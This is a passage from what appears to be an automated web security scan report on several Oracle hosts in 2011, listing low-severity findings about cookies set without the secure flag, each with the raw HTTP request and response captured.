s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:51 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2768
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-885
...[SNIP]...

4.7. https://cloud.oracle.com/mycloud/f  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cloud.oracle.com
Path:   /mycloud/f

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mycloud/f?p=service2:notify_me:0 HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cloud.oracle.com/mycloud/f?p=service:home:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318815502460; gpw_e24=http%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice%3Ahome%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FOracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice2%25253Anotify_me%25253A0%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-11g
Location: http://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Mon, 17 Oct 2011 01:38:03 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; HttpOnly
Set-Cookie: WWV_PUBLIC_SESSION_5003=4454627354458997; HttpOnly
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:05 GMT; path=/
Content-Length: 317

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://cloud.oracle.com/mycloud/f?
...[SNIP]...

4.8. https://cloud.oracle.com/mycloud/wwv_flow.accept  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cloud.oracle.com
Path:   /mycloud/wwv_flow.accept

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mycloud/wwv_flow.accept HTTP/1.1
Host: cloud.oracle.com
Connection: keep-alive
Content-Length: 419
Cache-Control: max-age=0
Origin: https://cloud.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://cloud.oracle.com/mycloud/f?p=service2:notify_me:0:::::
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORACLE_CLOUD=BC96E6ADD30286BA; WWV_PUBLIC_SESSION_5003=4454627354458997; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; s_nr=1318815515990; gpw_e24=https%3A%2F%2Fcloud.oracle.com%2Fmycloud%2Ff%3Fp%3Dservice2%3Anotify_me%3A0%3A%3A%3A%3A%3A; s_sq=oraclecloud%3D%2526pid%253Dcloud%25253Aen-us%25253A%25252FNotify%252520Me%252520of%252520Updates%252520%25257C%252520Oracle%252520Public%252520Cloud%2526pidt%253D1%2526oid%253Djavascript%25253Aapex.submit('CREATE')%25253B%2526ot%253DA%26oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fproducts%25252Fapplications%25252Ffusion%25252F%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fcloud.oracle.com%25252Fmycloud%25252Ff%25253Fp%25253Dservice%25253Ahome%25253A0%25253A%25253A%25253A%25253A%25253A%2526ot%253DA

p_flow_id=5003&p_flow_step_id=1&p_instance=4454627354458997&p_page_submission_id=2015700381117342&p_request=CREATE&p_arg_names=77163203970299379&p_t01=&p_arg_names=77163411158299380&p_t02=&p_arg_names
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-11g
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-ORACLE-IGNORE: IGNORE
X-Powered-By: Servlet/2.5 JSP/2.1
X-Frame-Options: DENY
Content-Type: text/html; charset=utf-8
Content-Language: en
Vary: Accept-Encoding
Content-Length: 20548
Date: Mon, 17 Oct 2011 01:38:15 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwww_cloud_oracle_com_80=2463891081.24862.0000; expires=Mon, 17-Oct-2011 09:38:17 GMT; path=/

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6"> <![endif]-->
<!--[if IE 7 ]> <html class="ie7 no-css3"> <![endif]-->
<!--[if IE 8 ]> <html class="ie8 no-css3"> <![endif]-->
<!--[if IE 9 ]>
...[SNIP]...

4.9. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://irecruitment.oracle.com
Path:   /OA_HTML/IrcVisitor.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OA_HTML/IrcVisitor.jsp HTTP/1.1
Host: irecruitment.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=aI-seAnN7gYCF5vKSizOZg..
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=7edb662ed98453aac9dc9b74d3c9b8937d8701988a5259b0428b92ef860b014a.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure
Set-Cookie: GSI=i3Mem4huzzTQAdgFWILWhbRGmk; domain=.oracle.com; path=/
Connection: Close
Content-Length: 774
Date: Mon, 17 Oct 2011 02:33:27 GMT
Set-Cookie: BIGipServergsiap_irecruitment_http=1527616141.5150.0000; path=/

<HTML><HEAD><TITLE>Redirect to https://irecruitment.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US&params=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW
...[SNIP]...

4.10. https://login.oracle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 404 Not Found
Date: Mon, 17 Oct 2011 11:44:39 GMT
Content-Length: 1214
Content-Type: text/html; charset=UTF-8
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Draft//EN">
<HTML>
<HEAD>
<TITLE>Error 404--Not Found</TITLE>
<META NAME="GENERATOR" CONTENT="WebLogic Server">
</HEAD>
<BODY bgcolor="white">
<FONT FACE=He
...[SNIP]...

4.11. https://login.oracle.com/mysso/signon.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/signon.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /mysso/signon.jsp HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Content-Length: 2922
Cache-Control: max-age=0
Origin: https://login.oracle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~656BF073~F67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069DAB23D915BE79162A1B4BF967143AEB61184B94E138006D6FFE796DE511124E75F31EE38071343B458D610C13DE2ADFEE1D98673636EF6AD33794DBCC4C829C2520F480DE660CA3405DF5A18EE7B5918EFA7B6C07474FED018F4130EF14C5A156B204A46DD4CCCE5961688BD1BE8B3B6464B6A8558C65A283EF303875B11069F113634DCD5DF6192FFF776E76A04CFA73900D45393D18CFE0B1B8694866
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

site2pstoretoken=v1.2%7E656BF073%7EF67CCD99F8206924258D38DB351220E7A87F5CFA2A247E104D45F3F4AEEA543333D56FD366F29DB82FD299833B34B055A2C5E8B8B9A2C0B53FD5A340B222C52BCD9FB3F943986E3C519C3179851D7BFE59069
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 17 Oct 2011 11:44:39 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-ORACLE-DMS-ECID: 0000JCHge886MQK6EVaAUS1EaweP001nsg
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:39 GMT; path=/
Content-Length: 15157


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html
...[SNIP]...

4.12. https://login.oracle.com/mysso/sso_loginui/b-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-bg.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 51
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgeuk6MQK6EVaAUS1EaweP001nuQ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a...................!.......,..............P.;

4.13. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 188
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgev^6MQK6EVaAUS1EaweP001nuT
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;

4.14. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/b-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 190
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgexh6MQK6EVaAUS1EaweP001nuX
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;

4.15. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgeuK6MQK6EVaAUS1EaweP001nuO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.D.di........
.,..........#.3!..R".$.......N..br29..[..@.4l.4@a...pw..;

4.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-l-t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-l-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge^k6MQK6EVaAUS1EaweP001ntN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$.AtHh..# ..C.t=..P.|=..DoH..v.^...>..^b..).U.$......8<....l......d..;

4.17. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-line.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgeuH6MQK6EVaAUS1EaweP001nuN
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.............!.......,..............P.;

4.18. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:42 GMT
Accept-Ranges: bytes
Content-Length: 198
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHgev06MQK6EVaAUS1EaweP001nuS
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:42 GMT; path=/

GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n
..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;

4.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:41 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000JCHge_T6MQK6EVaAUS1EaweP001ntO
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=2869727885.16927.0000; expires=Mon, 17-Oct-2011 19:44:41 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;

4.20. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-t-line.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://login.oracle.com/mysso/signon.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; gpv_p24=http%3A//www.oracle.com/us/education/selectcountry-new-079003.html; s_cc=true; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; BIGipServerloginadc_oracle_com_http=2869727885.16927.0000

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 11:44:44 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
